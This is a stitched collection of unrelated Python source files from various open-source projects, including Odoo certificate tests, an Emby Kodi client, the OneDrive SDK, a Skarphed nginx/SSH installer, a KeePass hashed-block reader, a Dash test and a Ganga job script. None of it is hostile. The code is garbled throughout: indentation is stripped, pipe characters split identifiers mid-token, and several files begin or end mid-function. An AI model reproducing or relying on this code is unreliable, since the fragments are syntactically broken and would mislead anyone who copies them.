@six.add_metaclass(Singleton)
class MDStudioClaimSchema(object):
def __init__(self, session):
with open(os.path.join(session.mdstudio_schemas_path(), 'claims.v1.json'), 'r') as base_claims_file:
self.schema = json.load(base | _claims_fi | le)
def to_schema(self):
return self.schema
@staticmethod
def flatten(session):
return True
class ResourceSchema(ISchema):
def __init__(self, uri, versions=None):
super(ResourceSchema, self).__init__()
uri_decomposition = re.match(r'([\w\-_]+)/([\w\-_]+)/([\w/\-_]+?)(/((v?\d+,?)*))?$', uri)
if not uri_decomposition:
raise RegisterException(
'An resource schema uri must be in the form "resource://<vendor>/<component>/<schema path>(/v<versions>), '
'where <versions> is a comma separated list of version numbers. Only alphanumberic, and "/_-" characters are supported. '
'We got "resource://{}".'.format(uri))
self.vendor = uri_decomposition.group(1)
self.component = uri_decomposition.group(2)
self.schema_path = uri_decomposition.group(3)
uri_versions = uri_decomposition.group(5)
self.versions = versions or ([int(v) for v in uri_versions.replace('v', '').split(',')] if uri_versions else [1])
@chainable
def flatten(self, session=None):
# type: (CommonSession) -> bool
if self.cached:
return_value(True)
if session.component_config.static.vendor == self.vendor and session.component_config.static.component == self.component:
self._retrieve_local(os.path.join(session.component_schemas_path(), 'resources'), self.schema_path, self.versions)
else:
yield self._retrieve_wamp(session)
success = True
for version, schema in self.cac |
OCA/l10n-brazil | l10n_br_fiscal/tests/test_certificate.py | Python | agpl-3.0 | 4,074 | 0 | # Copyright 2019 Akretion - Renato Lima <renato.lima@akretion.com.br>
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from datetime import timedelta
from odoo import fields
from odoo.exceptions import ValidationError
from odoo.tests import common
from odoo.tools.misc import format_date
from ..tools import misc
class TestCertificate(common.TransactionCase):
def setUp(self):
super().setUp()
self.company_model = self.env["res.company"]
self.certificate_model = self.env["l10n_br_fiscal.certificate"]
self.company = self._create_compay()
self._switch_user_company(self.env.user, self.company)
self.cert_country = "BR"
self.cert_issuer_a = "EMISSOR A TESTE"
self.cert_issuer_b = "EMISSOR B TESTE"
self.cert_subject_valid = "CERTIFICADO VALIDO TESTE"
self.cert_date_exp = fields.Datetime.today() + timedelta(days=365)
self.cert_subject_invalid = "CERTIFICADO INVALIDO TESTE"
self.cert_passwd = "123456"
self.cert_name = "{} - {} - {} - Valid: {}".format(
"NF-E",
"A1",
self.cert_subject_valid,
format_date(self.env, self.cert_date_exp),
)
self.certificate_valid = misc.create_fake_certificate_file(
valid=True,
passwd=self.cert_passwd,
issuer=self.cert_issuer_a,
country=self.cert_country,
subject=self.cert_subject_valid,
)
self.certificate_invalid = misc.create_fake_certificate_file(
valid=False,
passwd=self.cert_passwd,
issuer=self.cert_issuer_b,
country=self.cert_country,
subject=self.cert_subject_invalid,
)
def _create_compay(self):
"""Creating a company"""
company = self.env["res.company"].create(
{
"name": "Company Test Fiscal BR",
"cnpj_cpf": "42.245.642/0001-09",
"country_id": self.env.ref("base.br").id,
"state_id": self.env.ref("base.state_br_sp").id,
}
)
return company
def _switch_user_company(self, user, company):
""" Add a company to the user's allowed & set to current. """
user.write(
{
"company_ids": [(6, 0, (company + user.company_ids).ids)],
"company_id": company.id,
}
)
def test_valid_certificate(self):
"""Create and check a valid certificate"""
cert = self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": self.cert_passwd,
"file": self.certificate_valid,
}
)
self.assertEqual(cert.issuer_name, self.cert_issuer_a)
self.assertEqual(cert.owner_name, self.cert_subject_valid)
self.assertEqual(cert.date_expiration.year, self.c | ert_date_exp.year)
self.assertEqual(cert.date_expiration.month, self.cert_date_exp.month)
self.assertEqual(cert.date_expiration.day, self.cert_date_exp.day)
self.assertEqual(cert.name, self.cert_name)
self.assertEqual(cert.is_valid, True)
def test_certificate_wrong_password(self):
"""Write a valid certificate with wron | g password"""
with self.assertRaises(ValidationError):
self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": "INVALID",
"file": self.certificate_valid,
}
)
def test_invalid_certificate(self):
"""Create and check a invalid certificate"""
with self.assertRaises(ValidationError):
self.certificate_model.create(
{
"type": "nf-e",
"subtype": "a1",
"password": self.cert_passwd,
"file": self.certificate_invalid,
}
)
|
goofwear/Emby.Kodi | resources/lib/ReadEmbyDB.py | Python | gpl-2.0 | 15,756 | 0.008314 | # -*- coding: utf-8 -*-
#################################################################################################
# ReadEmbyDB
#################################################################################################
from DownloadUtils import DownloadUtils
class ReadEmbyDB():
doUtils = DownloadUtils()
urllimit = 50
def filterbyId(self, result, itemList = []):
newResult = []
for item in result:
if item['Id'] in itemList:
newResult.append(item)
return newResult
def getMovies(self, parentId, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?ParentId=%s&SortBy=SortName&Fields=CumulativeRunTimeTicks,Etag&Recursive=true&SortOrder=Descending&IncludeItemTypes=Movie&CollapseBoxSetItems=false&ImageTypeLimit=1&format=json" % parentId
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicVideos(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/items?&SortBy=SortName&Fields=CumulativeRunTimeTicks,Etag&Recursive=true&SortOrder=Descending&IncludeItemTypes=MusicVideo&CollapseBoxSetItems=false&ImageTypeLimit=1&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicArtists(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/Artists?Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicArtistsTotal(self):
result = []
url = "{server}/Artists?Limit=1&Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/Artists?StartIndex=%s&Limit=%s&Recursive=true&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&UserId={UserId}&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
result.extend(jsondata['Items'])
index += jump
return result
def getMusicSongs(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
| except: pass
else: # If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(r | esult, itemList)
return result
def getMusicSongsTotal(self):
result = []
url = "{server}/mediabrowser/Users/{UserId}/Items?Index=1&Limit=1&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/mediabrowser/Users/{UserId}/Items?StartIndex=%s&Limit=%s&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=Audio&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
result.extend(jsondata['Items'])
index += jump
return result
def getMusicAlbums(self, itemList = []):
result = []
lenlist = len(itemList) < self.urllimit
# Only get basic info for our sync-compares
url = "{server}/mediabrowser/Users/{UserId}/Items?Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=MusicAlbum&format=json"
if itemList and lenlist:
url = "%s&Ids=%s" % (url, ",".join(itemList))
jsondata = self.doUtils.downloadUrl(url)
try:
result = jsondata['Items']
except: pass
else:
tempresult = []
# Only return valid albums - which have artists
for item in result:
if item['AlbumArtists']:
tempresult.append(item)
result = tempresult
# If list was longer than 49 items, we pulled the entire list so we need to sort
if not lenlist:
result = self.filterbyId(result, itemList)
return result
def getMusicAlbumsTotal(self):
result = []
url = "{server}/mediabrowser/Users/{UserId}/Items?Limit=1&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&Recursive=true&IncludeItemTypes=MusicAlbum&format=json"
jsondata = self.doUtils.downloadUrl(url)
total = jsondata['TotalRecordCount']
index = 1
jump = 200
while index < total:
url = "{server}/mediabrowser/Users/{UserId}/Items?StartIndex=%s&Limit=%s&Fields=Etag,Path,Genres,SortName,Studios,Writer,ProductionYear,Taglines,CommunityRating,OfficialRating,CumulativeRunTimeTicks,Metascore,AirTime,DateCreated,MediaStreams,People,Overview&SortBy=DateCreated&Recursive=true&IncludeItemTypes=MusicAlbum&format=json" % (index, jump)
jsondata = self.doUtils.downloadUrl(url)
tempresult = []
# Only return valid albums - which have artists
for item in jsondata['Items']:
|
evernym/plenum | plenum/test/msgs.py | Python | apache-2.0 | 572 | 0 | from plenum.common.messages.fields import NonEmptyStringField
from plenum.common.messages.message_base import MessageBase
from plenum.common.messages.node_message_factory import node_message_factory
from pl | enum.common.util import randomString
def randomMsg():
return TestMsg('subject ' + randomString(),
'content ' + randomString())
class TestMsg(MessageBase):
typename = "TESTMSG"
schema = (
("subject", NonEmptyStringField()),
("cont | ent", NonEmptyStringField()),
)
node_message_factory.set_message_class(TestMsg)
|
nwokeo/supysonic | venv/lib/python2.7/site-packages/storm/zope/metaconfigure.py | Python | agpl-3.0 | 1,225 | 0.000816 | #
# Copyright (c) 2006, 2007 Canonical
#
# Written by Gustavo Niemeyer <gustavo@niemeyer.net>
#
# This file is part of | Storm Object Relational Mapper.
#
# Storm is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published | by the Free Software Foundation; either version 2.1 of
# the License, or (at your option) any later version.
#
# Storm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from zope import component
from storm.zope.interfaces import IZStorm
def set_default_uri(name, uri):
"""Register C{uri} as the default URI for stores called C{name}."""
zstorm = component.getUtility(IZStorm)
zstorm.set_default_uri(name, uri)
def store(_context, name, uri):
_context.action(discriminator=("store", name),
callable=set_default_uri,
args=(name, uri))
|
AlessandroZ/LaZagne | Windows/lazagne/softwares/memory/libkeepass/hbio.py | Python | lgpl-3.0 | 4,214 | 0.002373 | # -*- coding: utf-8 -*-
import hashlib
import io
import struct
# default from KeePass2 source
BLOCK_LENGTH = 1024 * 1024
try:
file_types = (file, io.IOBase)
except NameError:
file_types = (io.IOBase,)
# HEADER_LENGTH = 4+32+4
def read_int(stream, length):
try:
return struct.unpack('<I', stream.read(length))[0]
except Exception:
return None
class HashedBlockIO(io.BytesIO):
"""
The data is stored in hashed blocks. Each block consists of a block index (4
bytes), the hash (32 bytes) and the block length (4 bytes), followed by the
block data. The block index starts counting at 0. The block hash is a
SHA-256 hash of the block data. A block has a maximum length of
BLOCK_LENGTH, but can be shorter.
Provide a I/O stream containing the hashed block data as the `block_stream`
argument when creating a HashedBlockReader. Alternatively the `bytes`
argument can be used to hand over data as a string/bytearray/etc. The data
is verified upon initialization and an IOError is raised when a hash does
not match.
HashedBlockReader is a subclass of io.BytesIO. The inherited read, seek, ...
functions shall be used to access the verified data.
"""
def __init__(self, block_stream=None, bytes=None):
io.BytesIO.__init__(self)
input_stream = None
if block_stream is not None:
if not (isinstance(block_stream, io.IOBase) or isinstance(block_stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
input_stream = block_stream
elif bytes is not None:
input_stream = io.BytesIO(bytes)
if input_stream is not None:
self.read_block_stream(input_stream)
def read_block_stream(self, block_stream):
"""
Read the whole block stream into the self-BytesIO.
"""
if not (isinstance(block_stream, io.IOBase) or isinstance(block_stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
while True:
data = self._next_block(block_stream)
if not self.write(data):
break
self.seek(0)
def _next_block(self, block_stream):
""" |
Read the next block and verify the data.
Raises an IOError if the hash does not match.
"""
index = read_int(block_stream, 4)
bhash = block_stream.read(32)
length = read_int(block_stream, 4)
if length > 0:
data = block_stream.read(length)
if hashlib.sha256(data).digest() == bhash:
return data
else:
| raise IOError('Block hash mismatch error.')
return bytes()
def write_block_stream(self, stream, block_length=BLOCK_LENGTH):
"""
Write all data in this buffer, starting at stream position 0, formatted
in hashed blocks to the given `stream`.
For example, writing data from one file into another as hashed blocks::
# create new hashed block io without input stream or data
hb = HashedBlockIO()
# read from a file, write into the empty hb
with open('sample.dat', 'rb') as infile:
hb.write(infile.read())
# write from the hb into a new file
with open('hb_sample.dat', 'w') as outfile:
hb.write_block_stream(outfile)
"""
if not (isinstance(stream, io.IOBase) or isinstance(stream, file_types)):
raise TypeError('Stream does not have the buffer interface.')
index = 0
self.seek(0)
while True:
data = self.read(block_length)
if data:
stream.write(struct.pack('<I', index))
stream.write(hashlib.sha256(data).digest())
stream.write(struct.pack('<I', len(data)))
stream.write(data)
index += 1
else:
stream.write(struct.pack('<I', index))
stream.write('\x00' * 32)
stream.write(struct.pack('<I', 0))
break
|
OneDrive/onedrive-sdk-python | src/python2/request/item_request.py | Python | mit | 3,549 | 0.003663 | # -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from ..request_base import RequestBase
from ..model.item import Item
import json
class ItemRequest(RequestBase):
"""The type ItemRequest."""
def __init__(self, request_url, client, options):
"""Constructs a new ItemRequest.
Args:
request_url (str): The url to perform the ItemRequest
on
client (:class:`OneDriveClient<onedrivesdk.request.one_drive_client.OneDriveClient>`):
The client which will be used for the request
options (list of :class:`Option<onedrivesdk.options.Option>`):
A list of options to pass into the request
"""
super(ItemRequest, self).__init__(request_url, client, options)
def delete(self):
"""Deletes the specified Item."""
self.method = "DELETE"
self.send()
def get(self):
"""Gets the specified Item.
Returns:
:class:`Item<onedrivesdk.model.item.Item>`:
The Item.
"""
self.method = "GET"
entity = Item(json.loads(self.send().content))
self._initialize_collection_properties(entity)
return entity
def update(self, item):
"""Updates the specified Item.
Args:
item (:class:`Item<onedrivesdk.model.item.Item>`):
The Item to update.
Returns:
:class:`Item<onedrivesdk.model.item.Item>`:
The updated Item.
"""
self.content_type = "application/json"
self.method = "PATCH"
entity = Item(json.loads(self.send(item).content))
self._initialize_collection_properties(entity)
return entity
def _initialize_collection_properties(self, value):
if value and value._prop_dict:
if value.permissions:
if "permissions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["permissions@odata.nextLink"]
value.permissions._next_page_link = next_page_link
if value.subscriptions:
if "subscriptions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["subscriptions@odata.nextLink"]
value.subscriptions._next_page_link = next_page_link
if value.versions:
if "versions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["versions@odata.nextLink"]
value.versions._next_page_link = next_page_link
if value.children:
if " | children@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["children@odata.nextLink"]
value.children._next_page_link = next_page_link
if value.tags:
if "tags@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["tags@odata.next | Link"]
value.tags._next_page_link = next_page_link
if value.thumbnails:
if "thumbnails@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["thumbnails@odata.nextLink"]
value.thumbnails._next_page_link = next_page_link
|
mogria/rtsh | srv/model/unitfactory.py | Python | gpl-2.0 | 546 | 0.005495 | from mod | el.commonfactory import CommonFactory
from model.slaveunit import SlaveUnit
from model.squireunit import SquireUnit
from model.swordfighterunit import SwordfighterUnit
from model.archerunit import ArcherUnit
from model.cavalryunit import CavalryUnit
UNIT_TYPES = {
'slave': SlaveUnit,
'squire': SquireUnit,
'swordfighter': SwordfighterUnit,
'archer': ArcherUnit,
'cavalry': CavalryUnit
}
def UnitFactory(unit_type = "none", *args, **kwargs):
return | CommonFactory("unit", unit_type, UNIT_TYPES, *args, **kwargs)
|
tsmrachel/remo | remo/profiles/migrations/0003_auto_20160921_1608.py | Python | bsd-3-clause | 610 | 0 | # -*- coding: utf-8 -*-
from __future__ im | port unicod | e_literals
from django.db import migrations, models
def forwards(apps, schema_editor):
"""Create Peers group."""
Group = apps.get_model('auth', 'Group')
Group.objects.create(name='Peers')
def backwards(apps, schema_editor):
"""Delete Peers group."""
Group = apps.get_model('auth', 'Group')
Group.objects.filter(name='Peers').delete()
class Migration(migrations.Migration):
dependencies = [
('profiles', '0002_auto_20160908_1534'),
]
operations = [
migrations.RunPython(forwards, backwards)
]
|
skarphed/skarphed | admin/installer/debian7_nginx/__init__.py | Python | agpl-3.0 | 6,232 | 0.011555 | #!/usr/bin/python
#-*- coding: utf-8 -*-
###########################################################
# © 2011 Daniel 'grindhold' Brendle and Team
#
# This file is part of Skarphed.
#
# Skarphed is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later
# version.
#
# Skarphed is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Skarphed.
# If not, see http://www.gnu.org/licenses/.
###########################################################
import os
import gobject
import json
import shutil
import tarfile
from glue.paths import INSTALLER
from data.skarphed.Skarphed import AbstractInstaller, AbstractDestroyer
from glue.lng import _
from glue.paths import COREFILES
import logging
TARGETNAME = "Debian 7 / nginx"
EXTRA_PARAMS = {
'nginx.domain':(_('Domain'),_('example.org or leave empty')),
'nginx.subdomain':(_('Subdomain'),_('sub.example.org or leave empty')),
'nginx.port':(_('Port'),_('80'))
}
class Installer(AbstractInstaller):
def execute_installation(self):
os.mkdir(self.BUILDPATH)
p = os.path.dirname(os.path.realpath(__file__))
nginx_template = open(os.path.join(p,"nginx.conf"),"r").read()
nginx_domain = ""
domainlineterm = ""
if self.data['nginx.port'] == "":
self.data['nginx.port'] = "80"
if self.data['nginx.domain'] != "":
nginx_domain = "server_name "+self.data['nginx.domain']
self.domain = self.data['nginx.domain']
domainlineterm = ";"
nginx_subdomain = ""
if self.data['nginx.subdomain'] != "":
nginx_subdomain = "alias "+self.data['nginx.subdomain']
domainlineterm = ";"
nginxconf = nginx_template%{'port':self.data['nginx.port'],
'domain':nginx_domain,
'su | bdomain':nginx_subdomain,
'domainlineterm':domainlineterm}
nginxconfresult = open(os.path.join(self.BUILDPATH,"nginx.conf"),"w")
nginxconfresult.write(nginxconf)
nginxconfresult.close()
self.status = 10
| gobject.idle_add(self.updated)
scv_config = {}
for key,val in self.data.items():
if key.startswith("core.") or key.startswith("db."):
if key == "db.name":
scv_config[key] = val+".fdb"
continue
scv_config[key] = val
scv_config_defaults = {
"core.session_duration":2,
"core.session_extend":1,
"core.cookielaw":1,
"core.debug":True
}
scv_config.update(scv_config_defaults)
jenc = json.JSONEncoder()
config_json = open(os.path.join(self.BUILDPATH,"config.json"),"w")
config_json.write(jenc.encode(scv_config))
config_json.close()
shutil.copyfile(os.path.join(p,"skarphed.conf"), os.path.join(self.BUILDPATH,"skarphed.conf"))
shutil.copyfile(os.path.join(p,"install.sh"), os.path.join(self.BUILDPATH,"install.sh"))
shutil.copyfile(os.path.join(p,"uwsgi.conf"), os.path.join(self.BUILDPATH,"uwsgi.conf"))
self.status = 30
gobject.idle_add(self.updated)
shutil.copytree(os.path.join(COREFILES,"web"), os.path.join(self.BUILDPATH, "web"))
shutil.copytree(os.path.join(COREFILES,"lib"), os.path.join(self.BUILDPATH,"lib"))
tar = tarfile.open(os.path.join(self.BUILDPATH,"scv_install.tar.gz"),"w:gz")
tar.add(os.path.join(self.BUILDPATH,"nginx.conf"))
tar.add(os.path.join(self.BUILDPATH,"uwsgi.conf"))
tar.add(os.path.join(self.BUILDPATH,"config.json"))
tar.add(os.path.join(self.BUILDPATH,"skarphed.conf"))
tar.add(os.path.join(self.BUILDPATH,"install.sh"))
tar.add(os.path.join(self.BUILDPATH,"web"))
tar.add(os.path.join(self.BUILDPATH,"lib"))
tar.close()
self.status = 45
gobject.idle_add(self.updated)
con = self.server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("mkdir /tmp/scvinst"+str(self.installationId))
self.status = 50
gobject.idle_add(self.updated)
con = self.server.getSSH()
ftp = con.open_sftp()
ftp.put(os.path.join(self.BUILDPATH,"scv_install.tar.gz"),"/tmp/scvinst"+str(self.installationId)+"/scv_install.tar.gz")
ftp.close()
self.status = 65
gobject.idle_add(self.updated)
con = self.server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("cd /tmp/scvinst"+str(self.installationId)+"; tar xvfz scv_install.tar.gz -C / ; chmod 755 install.sh ; ./install.sh ")
output = con_stdout.read()
logging.debug("SSH-outputlength: %d"%len(output))
logging.debug(output)
shutil.rmtree(self.BUILDPATH)
self.status = 100
gobject.idle_add(self.updated)
gobject.idle_add(self.addInstanceToServer)
class Destroyer(AbstractDestroyer):
def execute_destruction(self):
p = os.path.dirname(os.path.realpath(__file__))
server = self.instance.getServer()
self.status = 10
gobject.idle_add(self.updated)
con = server.getSSH()
ftp = con.open_sftp()
ftp.put(os.path.join(p,"teardown.sh"),"/tmp/teardown.sh")
ftp.close()
self.status = 30
gobject.idle_add(self.updated)
con = server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("cd /tmp/ ; chmod 755 teardown.sh ; ./teardown.sh %d "%self.instanceid)
logging.debug(con_stdout.read())
self.status = 100
gobject.idle_add(self.updated)
gobject.idle_add(self.updated)
gobject.idle_add(self.removeInstanceFromServer)
|
JeffAbrahamson/UNA_compta | ha_transfer.py | Python | gpl-3.0 | 2,996 | 0.002004 | #!/usr/bin/python3
"""Sum helloasso CSV file for certain accounts.
Used for computing balance transfers to next fiscal year.t
"""
import argparse
import dateutil.parser as dp
import pandas as pd
import sys
from tabulate import tabulate
# We have several get_data() functions, as the format changes slightly
# from campaign to campaign. The dataframe that they each return should
# be the same format.
def get_account_mappings(config_filename):
"""Get the mapping from helloasso descriptions to accounts.
This is a python-format config file in the form of a dict, each of
whose keys corresponds to a description value in the import file.
The values are dicts, one key is "default" and,if present,
represents the default account for that description. The other
key is "subdescr" with value a dict mapping subaccount
descriptions to accounts.
| """
with open(config_filename, 'r') as config_fp:
config = eval(config_fp.read())
return config
def find_account(config, descr, sub_descr):
if descr not in config:
return 'ignore'
descr_account = config[descr]
if 'subdescr' in descr_account and sub_descr in d | escr_account['subdescr']:
return descr_account['subdescr'][sub_descr]
if 'default' in descr_account:
return descr_account['default']
return 'ignore'
def make_find_account(config):
def this_find_account(row):
ret = find_account(config, row['description'], row['sub_description']),
return ret
return this_find_account
def get_data(infile, config):
"""Read dataframe from CSV file and return view.
"""
data = pd.read_csv(
infile,
sep=';',
)
data['amount'] = pd.Series(
[float(s.replace(',', '.'))
for s
in data['Montant']])
data['description'] = pd.Series(
[val.strip()
for val
in data.Campagne])
data['sub_description'] = pd.Series(
[str(val).strip()
for val
in data.Désignation])
# This sometimes needs to be customised to be a switch
# on data.Formule.
this_find_account = make_find_account(config)
data['account'] = data.apply(this_find_account, axis=1)
data_valid = data[data['Statut'] == 'Validé']
data_view = data_valid[['description', 'sub_description',
'amount', 'account']]
return data_view.groupby(['account']).sum()
def main():
"""Do what we do.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--infile', type=str, required=True,
help='Name of file to read')
parser.add_argument('--config', type=str, required=True,
help='config file mapping descriptions to accounts')
args = parser.parse_args()
config = get_account_mappings(args.config)
data_view = get_data(args.infile, config)
print(data_view)
return 0
if __name__ == '__main__':
retval = main()
sys.exit(retval)
|
aaalgo/owl | annotate/management/commands/import.py | Python | bsd-2-clause | 1,100 | 0.009091 | import sys
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError, transaction
from django.contrib.auth.models import User
from annotate.models import *
class Command(Ba | seCommand):
d | ef add_arguments(self, parser):
parser.add_argument('--run', action='store_true', default=False, help='')
pass
@transaction.atomic
def handle(self, *args, **options):
#hours = options['hours'] + 24 * options['days']
#check_and_import(hours, not options['run'], options['check'])
run = options['run']
for line in sys.stdin:
fs = line.strip().split('\t')
if len(fs) == 1:
path = fs[0]
meta = path
elif len(fs) == 2:
path, meta = fs
else:
raise Exception("bad line: %s" % line)
if run:
Image.objects.create(path = path, meta = meta)
else:
print(path, meta)
pass
pass
pass
|
plotly/dash | components/dash-core-components/tests/integration/input/test_input_and_state.py | Python | mit | 1,787 | 0 | import time
from multiprocessing import Value
from dash import Dash, Input, Output, State, dcc, html
import dash.testing.wait as wait
def test_state_and_inputs(dash_dcc):
app = Dash(__name__)
app.layout = html.Div(
[
dcc.Input(value="Initial Input", id="input"),
dcc.Input(value="Initial State", id="state"),
html.Div(id="output"),
]
)
call_count = Value("i", 0)
@app.callback(
Output("output", "children"),
inputs=[Input("input", "value")],
state=[State("state", "value")],
)
def update_output(input, state):
call_count.value += 1
return 'input="{}", state="{}"'.format(input, state)
dash_dcc.start_server(app)
input_ = dash_dcc.find_element("#input")
# callback gets called with initia | l input
wait.until(lambda: call_count.value == 1, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Input", state="Initial State"'
)
input_.send_keys("x")
wait.until(lambda: call_count.value == 2, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Inputx", state="Initial State"'
)
dash_dcc.find_element("#state").send_keys("x")
time.sleep(0.2)
assert call_count.value == 2
assert das | h_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Inputx", state="Initial State"'
), "state value sshould not trigger callback"
input_.send_keys("y")
wait.until(lambda: call_count.value == 3, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Inputxy", state="Initial Statex"'
), "input value triggers callback, and the last state change is kept"
assert dash_dcc.get_logs() == []
|
Williams224/davinci-scripts | kstaretappipig/JobSubmit.py | Python | mit | 1,942 | 0.031411 | #!/usr/bin/env ganga
import getpass
from distutils.util import strtobool
polarity='MagDown'
datatype='MC'
substitution='None'
channel='11164031'
b=Job()
b.application=DaVinci(version="v36r5")
if datatype=='MC':
b.application.optsfile='NTupleMaker_{0}.py'.format(polarity)
if datatype=='Data':
if substitution=='None':
b.application.optsfile='DNTupleMaker.py'
if substitution=='PimforKm':
b.application.optsfile='DNTupleMaker_PimforKm.py'
b.outputfiles=[DiracFile('Output.root')]
b.inputdata = b.application.readInputData('{0}_12_{1}_{2}.py'.format(datatype,channel,polarity))
if substitution=='None':
b.comment='{0}_12_{1}_{2}'.format(datatype,polarity,channel)
if substitution=='PimforKm':
b.comment='{0}_12_{1}_{2}_{3}'.format(datatype,polarity,channel,substitution)
if datatype=='Data':
| b.splitter = SplitByFiles(filesPerJob=10)
if datatype=='MC':
b.splitter = SplitByFiles(filesPerJob=2)
#b.OutputSandbox=["stderr","stdout"]
b.backend=Dirac()
#b.submit()
queues.add(b.submit)
polarity='MagUp'
b2=Job()
b2.application=DaVinci(version="v36r5")
if datatype=='MC':
b2.application.optsfile='NTupleMaker_{0}.py'.format(polarity)
if datatype=='Data':
if substitution=='None':
b2.application.optsfile=' | DNTupleMaker.py'
if substitution=='PimforKm':
b2.application.optsfile='DNTupleMaker_PimforKm.py'
b2.outputfiles=[DiracFile('Output.root')]
b2.inputdata = b2.application.readInputData('{0}_12_{1}_{2}.py'.format(datatype,channel,polarity))
if substitution=='None':
b2.comment='{0}_12_{1}_{2}'.format(datatype,polarity,channel)
if substitution=='PimforKm':
b2.comment='{0}_12_{1}_{2}_{3}'.format(datatype,polarity,channel,substitution)
if datatype=='Data':
b2.splitter = SplitByFiles(filesPerJob=10)
if datatype=='MC':
b2.splitter = SplitByFiles(filesPerJob=2)
